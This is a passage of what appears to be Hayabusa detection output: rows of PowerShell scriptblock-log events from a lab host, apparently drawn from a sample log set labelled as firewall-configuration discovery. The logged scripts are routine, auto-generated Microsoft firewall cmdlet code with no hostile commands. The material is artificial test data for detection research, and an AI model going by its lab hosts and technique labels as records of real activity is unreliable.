[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') 
-contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 